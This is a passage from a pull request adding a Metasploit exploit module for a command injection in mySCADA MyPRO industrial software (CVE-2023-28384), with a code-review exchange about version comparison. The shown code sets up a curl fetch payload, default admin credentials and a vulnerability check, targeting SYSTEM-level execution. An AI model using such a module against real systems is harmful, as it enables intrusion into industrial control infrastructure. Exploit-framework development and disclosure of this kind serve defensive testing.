modules/exploits/windows/scada/mypro_cmdexe.rb

```diff
@@ -0,0 +1,174 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'mySCADA MyPRO Authenticated Command Injection (CVE-2023-28384)',
+        'Description' => %q{
+          Authenticated Command Injection in MyPRO <= v8.28.0 from mySCADA.
+          The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\SYSTEM.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['Michael Heinzl'], # Vulnerability discovery & MSF module
+        'References' => [
+          [ 'URL', 'https://www.cisa.gov/news-events/ics-advisories/icsa-23-096-06'],
+          [ 'CVE', '2023-28384']
+        ],
+        'DisclosureDate' => '2022-09-22',
+        'Platform' => 'win',
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'Targets' => [
+          [
+            'Windows_Fetch',
+            {
+              'Arch' => [ ARCH_CMD ],
+              'Platform' => 'win',
+              'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' },
+              'Type' => :win_fetch
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new(
+          'USERNAME',
+          [ true, 'The username to authenticate with (default: admin)', 'admin' ]
+        ),
+        OptString.new(
+          'PASSWORD',
+          [ true, 'The password to authenticate with (default: admin)', 'admin' ]
+        ),
+        OptString.new(
+          'TARGETURI',
+          [ true, 'The URI for the MyPRO web interface', '/' ]
+        )
+      ]
+    )
+  end
+
+  # Determine if the MyPRO instance runs a vulnerable version
+  def check
+    begin
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'l.fcgi'),
+        'vars_post' => {
+          't' => '98'
+        }
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+      return CheckCode::Unknown
+    ensure
+      disconnect
+    end
+
+    if res && res.code == 200
+      regex = /\{.*\}/m
+      json_body = res.body[regex, 0]
+      data = JSON.parse(json_body)
+      version = data['V']
+      if version.nil?
+        return CheckCode::Unknown
+      else
+        vprint_status('Version retrieved: ' + version)
+      end
+
+      parts = version.split('.')
+      major = parts[0]
+      minor = parts[1]
+      if major.to_i == 8 && minor.to_i <= 28
```

Comment:
You can use the `Rex::Version` here.
```suggestion
      if Rex::Version.new(version) <= Rex::Version.new('8.28')
```

Reply:
Thank you, I wasn't aware of this function, that's convenient.